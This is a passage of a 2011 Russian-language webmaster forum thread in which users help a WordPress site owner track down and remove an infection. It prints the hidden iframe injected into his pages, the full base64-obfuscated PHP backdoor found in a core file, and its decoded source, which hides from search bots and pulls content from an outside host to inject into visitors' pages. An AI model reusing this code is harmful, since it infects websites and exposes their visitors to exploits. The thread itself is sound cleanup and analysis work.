Перейти к содержимому


Пользователь месяца
Андрей WPMasterKZ Андрей WPMasterKZ 1-й за Ноябрь
Очков активности: 888 1 тема, 71 сообщение, 8 баллов репутации
Сайт: wpmaster.kz
ТОП самых активных за этот месяц
  • Фотография OlgaGetman
    #1

    OlgaGetman
    Очков активности: 780 6 тем, 112 сообщений, 4 балла репутации

  • Фотография Mandarin
    #2

    Mandarin
    Очков активности: 582 3 темы, 88 сообщений, 4 балла репутации

  • Фотография Андрей WPMasterKZ
    #3

    Андрей WPMasterKZ (wpmaster.kz)
    Очков активности: 189 Вне конкурса за определение пользователя месяца

  • Фотография TimurR
    #4

    TimurR
    Очков активности: 150 Вне конкурса за определение пользователя месяца

  • Фотография Rodiola
    #5

    Rodiola
    Очков активности: 138 2 темы, 17 сообщений, 4 балла репутации

  • Фотография BLIK
    #6

    BLIK
    Очков активности: 120 0 тем, 20 сообщений, 4 балла репутации

  • Фотография WGN
    #7

    WGN (worldgamenews.com)
    Очков активности: 48 Вне конкурса за определение пользователя месяца

  • Фотография pozitron123
    #8

    pozitron123
    Очков активности: 34.5 2 темы, 17 сообщений, 1 балл репутации

  • Фотография thisismyname
    #9

    thisismyname
    Очков активности: 27 4 темы, 6 сообщений, 1 балл репутации

  • Фотография m3Re
    #10

    m3Re
    Очков активности: 22.5 2 темы, 9 сообщений, 1 балл репутации

  • Показать весь ТОП 10
Поддержите форум! =)
Апдейты
  • Яндекс ИКС: 29.11.2018
  • Яндекс выдача: 13.12.2018
Топ 5 участников по репутации


С сайта поперли вирусы (стр. 2)

#21 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0
0

Отправлено 09 February 2011 - 13:14

Нет, базу пока не надо, давайте с файлами разберемся.
Много плагинов сейчас подключено.

Только, я надеюсь Вы поняли что архив директории нужен той которая сейчас на хосте реально, а не Ваша локальная копия.
  • 0

#22 softgaz

softgaz
    Topic Starter
  • Неактивные
  • 14 сообщений
  • Репутация: 0

Отправлено 09 February 2011 - 13:25

Нет, базу пока не надо, давайте с файлами разберемся.
Много плагинов сейчас подключено.

Только, я надеюсь Вы поняли что архив директории нужен той которая сейчас на хосте реально, а не Ваша локальная копия.


Естественно, это понятно: реальные скрипты

Нет, базу пока не надо, давайте с файлами разберемся.
Много плагинов сейчас подключено.

Только, я надеюсь Вы поняли что архив директории нужен той которая сейчас на хосте реально, а не Ваша локальная копия.


Отправил - заранее огромнейшее спасибо!!!
  • 0

#23 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 09 February 2011 - 15:53

softgaz, проверил все на наличие распространенных видов, способов подгрузки стороннего кода.
Так же прогнал сайт через несколько сервисов и программ.
Ничего подозрительного не нашел.

На данный момент у меня антивирус не ругается на Ваш сайт.
У Вас есть сейчас сообщения о вирусе, блокировка сайта?
  • 0

#24 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 09 February 2011 - 22:01

softgaz, вчера ,когда Вы начали данную тему у Вас действительно на сайте был вирус.
На данный момент мой антивирус не выдает уже сообщений о вирусе.
Возможно, Вы сами еще с утра в результате замены ,обновлении текущей темы удалили его.
Либо произвели еще какие-либо действия.

Пишите еще раз в Яндекс, 90% что вируса на данный момент нет. ;)
  • 0

#25 surfer

surfer
  • Заблокированные
  • 1956 сообщений
  • Репутация: 71

Отправлено 09 February 2011 - 22:04

есть вирус ;) ты хостеру писал?
  • 0

#26 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 09 February 2011 - 22:09

есть вирус ;) ты хостеру писал?



Да, действительно, сейчас повторно зашел и началось
  • 0

#27 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 09 February 2011 - 22:15

Вот собственно лог журнала:

09.02.2011 22:12:46 Фильтр HTTP файл http://ladygaga.ipq.co/games/pdf2.php?f=23 JS/Exploit.Pdfka.OQD троянская программа соединение прервано - изолирован KISMEDIA\Юрий Обнаружена угроза при попытке доступа в Интернет следующим приложением: C:\Program Files\Opera\opera.exe.
  • 0

#28 surfer

surfer
  • Заблокированные
  • 1956 сообщений
  • Репутация: 71

Отправлено 09 February 2011 - 22:24

он самый, может через сервак бьют, писал хостеру?
ну есчо через скрипт могут, надо проверить версию ВП, плагины какие стоят
свою машину проверял?
  • 0

#29 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 09 February 2011 - 23:13

Нашел я твой код в исходнике страницы:

<!-- RSS -->
<div id="header-rss"><a href="http://www.softgaz.ru/?feed=rss2">Подписка на RSS</a></div>
<div id="header-comments"><iframe src="http://ladygaga.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe><a href="http://www.softgaz.ru/?feed=comments-rss2">Комментарии RSS</a></div>

<!-- Categories -->


Реально Фрэйм пропустил, пропарил, да и хорошо он вообще замаскирован, вклинился прямо в часть кода, не где-то там сбоку.

Правда, архив твоей темы у меня на работе остался, а со своего сервера ты уже его удалил.
Можешь сам его найти и убрать. ;)

Убрать нужно это:

<iframe src="http://ladygaga.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe>


Возможно в файле header.php

P.S. Понял почему я его не нашел, по-ходу все-таки подгружается он у тебя динамически в шаблон.
То он есть, то его нет.
Завтра просканирую еще раз весь твой архив.

surfer правильно говорит:

он самый, может через сервак бьют, писал хостеру?
ну есчо через скрипт могут, надо проверить версию ВП, плагины какие стоят
свою машину проверял?


Если такая хрень хитрая, прячится еще постоянно, все нужно проверять.
Хостеру напиши!
  • 0

#30 softgaz

softgaz
    Topic Starter
  • Неактивные
  • 14 сообщений
  • Репутация: 0

Отправлено 10 February 2011 - 07:52

Нашел я твой код в исходнике страницы:

<!-- RSS -->
<div id="header-rss"><a href="http://www.softgaz.ru/?feed=rss2">Подписка на RSS</a></div>
<div id="header-comments"><iframe src="http://ladygaga.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe><a href="http://www.softgaz.ru/?feed=comments-rss2">Комментарии RSS</a></div>

<!-- Categories -->


Реально Фрэйм пропустил, пропарил, да и хорошо он вообще замаскирован, вклинился прямо в часть кода, не где-то там сбоку.

Правда, архив твоей темы у меня на работе остался, а со своего сервера ты уже его удалил.
Можешь сам его найти и убрать. ;)

Убрать нужно это:

<iframe src="http://ladygaga.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe>


Возможно в файле header.php

P.S. Понял почему я его не нашел, по-ходу все-таки подгружается он у тебя динамически в шаблон.
То он есть, то его нет.
Завтра просканирую еще раз весь твой архив.

surfer правильно говорит:


Если такая хрень хитрая, прячится еще постоянно, все нужно проверять.
Хостеру напиши!



Мужики, просто не знаю, как вас благодарить!
Но кода вируса в РНР я не нашел! Поэтому просто убрал эту строчку в header.php
Но по всему получается, что этот вирус сидит в базе...
  • 0

#31 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 10 February 2011 - 08:29

Мужики, просто не знаю, как вас благодарить!
Но кода вируса в РНР я не нашел! Поэтому просто убрал эту строчку в header.php
Но по всему получается, что этот вирус сидит в базе...


Сегодня проверю еще весь твой архив, вместе с плагинами. Возможно там где сидит основной код, который "долбит" тему.
Наверняка в зашифрованном виде.
Но уже проще, мы знаем результат его работы, что именно искать.

Но кода вируса в РНР я не нашел!


Я уже на это и не расчитывал когда писал P.S. , не все так просто.
  • 0

#32 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 10 February 2011 - 11:31

Открой вот этот файл \wp-includes\link-template.php

Найди:

eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCJvYl9zdGFydCIpICYmICFmdW5jdGlvbl9leGlzdHMoInpveGdf
cm9kIikgJiYgIWZ1bmN0aW9uX2V4aXN0cygiZW1wcl9heGYiKSAmJiAhZnVuY3Rpb25fZXhpc3RzKCJx
b
2d1bV9ubmMiKSAmJiAhaXNzZXQoJEdMT0JBTFNbImJiZiJdKSAmJiBAc3RycG9zKHN0cnRvbG93ZXIoJ
F
9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSwiZ29vZ2xlYm90IikgPT09IGZhbHNlICYmIEBzdHJwb3
M
oc3RydG9sb3dlcigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0pLCJtc25ib3QiKSA9PT0gZmFsc2U
g
JiYgQHN0cnBvcyhzdHJ0b2xvd2VyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSksInlhaG9vIikg
P
T09IGZhbHNlICYmICFpc3NldCgkX0NPT0tJRVsidHBrIl0pICl7JEdMT0JBTFNbImJiZiJdID0gMTtzZ
X
Rjb29raWUoInRwayIsIDEsIHRpbWUoKSszNjAwKjI0KjEsICIvIik7ICAgICAgICAgICAgZnVuY3Rpb2
4
gZW1wcl9heGYoJGd6ZW5jb2RlX2FyZykNCiAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICA
g
ICAgICR4ID0gQG9yZChAc3Vic3RyKCRnemVuY29kZV9hcmcsIDMsIDEpKTsNCiAgICAgICAgICAgICAg
I
CAgICAgJHNoaWZ0ID0gMTA7DQogICAgICAgICAgICAgICAgICAgICRzaGlmdDIgPSAwOw0KICAgICAgI
C
AgICAgICAgICAgICBpZiggJHgmNCApDQogICAgICAgICAgICAgICAgICAgIHsNCiAgICAgICAgICAgIC
A
gICAgICAgICAgICR1bnBhY2s9QHVucGFjaygidiIsIHN1YnN0cigkZ3plbmNvZGVfYXJnLCAxMCwgMik
p
Ow0KICAgICAgICAgICAgICAgICAgICAgICAgJHVucGFjaz0kdW5wYWNrWzFdOyAkc2hpZnQrPSAyICsg
J
HVucGFjazsNCiAgICAgICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgICAgICBpZiggJHgmO
C
ApDQogICAgICAgICAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAgICAgICAgICRzaGlmdCA9IE
B
zdHJwb3MoJGd6ZW5jb2RlX2FyZywgY2hyKDApLCAkc2hpZnQpICsgMTsNCiAgICAgICAgICAgICAgICA
g
ICAgfQ0KICAgICAgICAgICAgICAgICAgICBpZiggJHgmMTYgKQ0KICAgICAgICAgICAgICAgICAgICB7
D
QogICAgICAgICAgICAgICAgICAgICAgICAkc2hpZnQgPSBAc3RycG9zKCRnemVuY29kZV9hcmcsIGNoc
i
gwKSwgJHNoaWZ0KSArIDE7DQogICAgICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgICAgICAgIC
A
gaWYoICR4JjIgKQ0KICAgICAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgICAgICA
k
c2hpZnQgKz0gMjsNCiAgICAgICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgICAgICAkZ3pp
c
CA9IEBnemluZmxhdGUoQHN1YnN0cigkZ3plbmNvZGVfYXJnLCAkc2hpZnQpKTsNCiAgICAgICAgICAgI
C
AgICAgICAgaWYoJGd6aXAgPT09IEZBTFNFKQ0KICAgICAgICAgICAgICAgICAgICB7DQogICAgICAgIC
A
gICAgICAgICAgICAgICAkZ3ppcCA9ICRnemVuY29kZV9hcmc7DQogICAgICAgICAgICAgICAgICAgIH0
N
CiAgICAgICAgICAgICAgICAgICAgcmV0dXJuICRnemlwOw0KICAgICAgICAgICAgICAgIH0NCg0KICAg
I
GZ1bmN0aW9uIHFvZ3VtX25uYyggJHVybCApIHsNCg0KLyogICAgICBpZiAoZnVuY3Rpb25fZXhpc3RzK
C
JjdXJsX2luaXQiKSkNCiAgICAgICAgew0KICAgICAgICAgICRjaCA9IGN1cmxfaW5pdCgkdXJsKTsNCi
A
gICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7DQogICA
g
ICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7DQogICAgICAgICAgICAk
Y
3VybF9yZXN1bHQgPSBjdXJsX2V4ZWMgKCRjaCk7DQogICAgICAgICAgICBjdXJsX2Nsb3NlKCRjaCk7D
Q
ogICAgICAgICAgICBpZiAoJGN1cmxfcmVzdWx0KSByZXR1cm4gJGN1cmxfcmVzdWx0Ow0KICAgICAgIC
B
9DQoNCiAgICAgICAgaWYgKEBpbmlfZ2V0KCJhbGxvd191cmxfZm9wZW4iKSkNCiAgICAgICAgew0KICA
g
ICAgICAgICAgJGZpbGVfcmVzdWx0ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCR1cmwpOw0KICAgICAgICAg
I
CAgaWYgKCRmaWxlX3Jlc3VsdCkgcmV0dXJuICRmaWxlX3Jlc3VsdDsNCiAgICAgICAgfSAgICovDQoNC
i
AgICAgICAgJHVybF9pbmZvID0gcGFyc2VfdXJsKCR1cmwpOw0KICAgICAgICAkcXVlcnkgID0gIkdFVC
A
kdXJsIEhUVFAvMS4wXHJcbiI7DQogICAgICAgICRxdWVyeSAuPSAiSG9zdDogIiAuICR1cmxfaW5mb1s
i
aG9zdCJdIC4gIlxyXG4iOw0KICAgICAgICAkcXVlcnkgLj0gIkNvbm5lY3Rpb246IENsb3NlXHJcblxy
X
G4iOw0KICAgICAgICAkZnAgPSBAZnNvY2tvcGVuKCR1cmxfaW5mb1siaG9zdCJdLCA4MCwgJGVycm5vL
C
AkZXJyc3RyLCA1KTsNCiAgICAgICAgaWYgKCEkZnApIHJldHVybiBmYWxzZTsNCiAgICAgICAgQGZwdX
R
zKCRmcCwgJHF1ZXJ5KTsNCiAgICAgICAgQHNvY2tldF9zZXRfdGltZW91dCAoJGZwLCA1LCAwKTsNCiA
g
ICAgICAgJHNfcmV0Y29kZSA9IEBzdWJzdHIgKEBmZ2V0cyAoJGZwLCA0MDk2KSwgOSwgMyk7DQogICAg
I
CAgIGlmICgkc19yZXRjb2RlezB9IDw+ICIyIikge3JldHVybiBGQUxTRTt9DQogICAgICAgIHdoaWxlI
C
ghIEBmZW9mICgkZnApKQ0KICAgICAgICB7DQogICAgICAgICAgICBpZiAoIlxyXG4iID09PSBAZmdldH
M
gKCRmcCwgNDA5NikpIHticmVhazt9DQogICAgICAgIH0NCiAgICAgICAgJHNvY2tldF9yZXN1bHQgPSA
i
IjsNCiAgICAgICAgd2hpbGUgKCEgQGZlb2YgKCRmcCkpIHsNCiAgICAgICAgICAgICRzb2NrZXRfcmVz
d
Wx0IC49IEBmZ2V0cyAoJGZwLCA0MDk2KTsNCiAgICAgICAgfQ0KICAgICAgICBAZmNsb3NlKCRmcCk7D
Q
ogICAgICAgIGlmICgkc29ja2V0X3Jlc3VsdCkgcmV0dXJuICRzb2NrZXRfcmVzdWx0Ow0KICAgIH0NCi
A
gICBmdW5jdGlvbiB6b3hnX3JvZCgkZW5mKXtnbG9iYWwgJGloZGVnX2J2ZztyZXR1cm4gcHJlZ19yZXB
s
YWNlKCIjKDwvdGFibGU+Lio8dGQ+fDwvdGFibGU+fDwvZGl2PltePD5dKjxkaXZbXjw+XSo+fDwvYm9k
e
T4pI2lzIiwgIiQxIiAuICRpaGRlZ19idmcsIGVtcHJfYXhmKCRlbmYpLCAxKTsNCiAgICB9JGloZGVnX
2
J2Zz1xb2d1bV9ubmMoYmFzZTY0X2RlY29kZSgiYUhSMGNEb3ZMMmRqYjNWdWRHVnlMbU51TDJsdVptOH
V
jR2h3IikgLiAiP2k9IiAuICRfU0VSVkVSWyJSRU1PVEVfQUREUiJdKTtAcHJlZ19tYXRjaCgiIzxvcGV
u
PiguKik8L2Nsb3NlPiMiLCAkaWhkZWdfYnZnLCAkbWF0Y2hlcyk7JGloZGVnX2J2Zz0gaXNzZXQoJG1h
d
GNoZXNbMV0pID8gJG1hdGNoZXNbMV0gOiAiIjtpZiAoJGloZGVnX2J2ZykgIG9iX3N0YXJ0KCJ6b3hnX
3
JvZCIpO30="));


Попробуй удалить этот кусок кода.

Сейчас еще попробую расшифровать эту хрень, для 100% уверенности.
  • 0

#33 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 10 February 2011 - 11:40

Вот расшифровка, не знаю что это, но больше ничего подозрительного, кроме выше приведенного кода зашифрованного через Base64, я не нашел.

if(function_exists("ob_start") && !function_exists("zoxg_rod") && !function_exists("empr_axf") && !function_exists("qogum_nnc") && !isset($GLOBALS["bbf"]) && @strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),"googlebot") === false && @strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),"msnbot") === false && @strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),"yahoo") === false && !isset($_COOKIE["tpk"]) ){$GLOBALS["bbf"] = 1;setcookie("tpk", 1, time()+3600*24*1, "/");			function empr_axf($gzencode_arg)
{
$x = @ord(@substr($gzencode_arg, 3, 1));
$shift = 10;
$shift2 = 0;
if( $x&4 )
{
$unpack=@unpack("v", substr($gzencode_arg, 10, 2));
$unpack=$unpack[1]; $shift+= 2 + $unpack;
}
if( $x&8 )
{
$shift = @strpos($gzencode_arg, chr(0), $shift) + 1;
}
if( $x&16 )
{
$shift = @strpos($gzencode_arg, chr(0), $shift) + 1;
}
if( $x&2 )
{
$shift += 2;
}
$gzip = @gzinflate(@substr($gzencode_arg, $shift));
if($gzip === FALSE)
{
$gzip = $gzencode_arg;
}
return $gzip;
}

function qogum_nnc( $url ) {

/* if (function_exists("curl_init"))
{
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$curl_result = curl_exec ($ch);
curl_close($ch);
if ($curl_result) return $curl_result;
}

if (@ini_get("allow_url_fopen"))
{
$file_result = @file_get_contents($url);
if ($file_result) return $file_result;
} */

$url_info = parse_url($url);
$query = "GET $url HTTP/1.0\r\n";
$query .= "Host: " . $url_info["host"] . "\r\n";
$query .= "Connection: Close\r\n\r\n";
$fp = @fsockopen($url_info["host"], 80, $errno, $errstr, 5);
if (!$fp) return false;
@fputs($fp, $query);
@socket_set_timeout ($fp, 5, 0);
$s_retcode = @substr (@fgets ($fp, 4096), 9, 3);
if ($s_retcode{0} <> "2") {return FALSE;}
while (! @feof ($fp))
{
if ("\r\n" === @fgets ($fp, 4096)) {break;}
}
$socket_result = "";
while (! @feof ($fp)) {
$socket_result .= @fgets ($fp, 4096);
}
@fclose($fp);
if ($socket_result) return $socket_result;
}
function zoxg_rod($enf){global $ihdeg_bvg;return preg_replace("#(</table>.*<td>|</table>|</div>[^<>]*<div[^<>]*>|</body>)#is", "$1" . $ihdeg_bvg, empr_axf($enf), 1);
}$ihdeg_bvg=qogum_nnc(base64_decode("aHR0cDovL2djb3VudGVyLmNuL2luZm8ucGhw") . "?i=" . $_SERVER["REMOTE_ADDR"]);@preg_match("#<open>(.*)</close>#", $ihdeg_bvg, $matches);$ihdeg_bvg= isset($matches[1]) ? $matches[1] : "";if ($ihdeg_bvg) ob_start("zoxg_rod");}

  • 0

#34 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 10 February 2011 - 12:01

Еще в теме e-storage-plus есть три больших вхождения eval(base64_decode
Но не думаю что они работают, тема активирована другая. Можешь удалить ее, все равно не используешь.
  • 0

#35 surfer

surfer
  • Заблокированные
  • 1956 сообщений
  • Репутация: 71

Отправлено 10 February 2011 - 12:03

данный кусок кода подключает http://gcounter.cn/info.php и отсюда идет атака
  • 0

#36 softgaz

softgaz
    Topic Starter
  • Неактивные
  • 14 сообщений
  • Репутация: 0

Отправлено 10 February 2011 - 12:04

Вот расшифровка, не знаю что это, но больше ничего подозрительного, кроме выше приведенного кода зашифрованного через Base64, я не нашел.


Удалил - все работает!
Но поступил проще: скопировал этот файл с другого своего сайта!
СПАСИБО ОГРОМНЕЙШЕЕ!!!!!!!!!
ПРОСТО НЕ ЗНАЮ - КАК БЛАГОДАРИТЬ!!!!!!!!!!
ПИВО ПРИ ВСТРЕЧЕ - ГАРАНТИРУЮ!!!!!!!!!!!!!
  • 0

#37 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 10 February 2011 - 12:12

данный кусок кода примитивно подключает http://gcounter.cn/info.php


По этому адресу и есть вирус.
То есть работал он получается в несколько этапов.
Вначале подгружал http://gcounter.cn/info.php, а с него уже брал код вставки в исходник.
<iframe src="http://ladygaga.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe>

Вполне возможно, что данный код еще и менялся постоянно, или исчезал на время, отследить тяжело.

Короче нормальную хрень ты подхватил! ;)
Я с таким, до этого не сталкивался, обычно вирус тупо прописывался в файлы шаблона.
  • 0

#38 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 10 February 2011 - 12:27

Причем URL http://gcounter.cn/info.php зашифрован дважды.
$ihdeg_bvg=qogum_nnc(base64_decode("aHR0cDovL2djb3VudGVyLmNuL2luZm8ucGhw")


Красивый вирусняк такой. ;)
  • 0

#39 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 10 February 2011 - 13:22

Сообщение 33 , код посмотрите уже расшифрованный в конце.
  • 0

#40 softgaz

softgaz
    Topic Starter
  • Неактивные
  • 14 сообщений
  • Репутация: 0

Отправлено 10 February 2011 - 13:25

А почемы вы решили что дважды?


Я другое никак не пойму: а почему дата файла не поменялась?! Я ж все искал в соответствии с инструкциями Яндекса: смотри по датам изменения файлов! А они не поменялись - как такое возможно?
  • 0

robot

robot
  • Пользователь PRO
  • 2652 сообщений
  • Репутация: 85


Похожие темы

  Название темы Автор Статистика Последнее сообщение

Оформление форума – IPBSkins.ru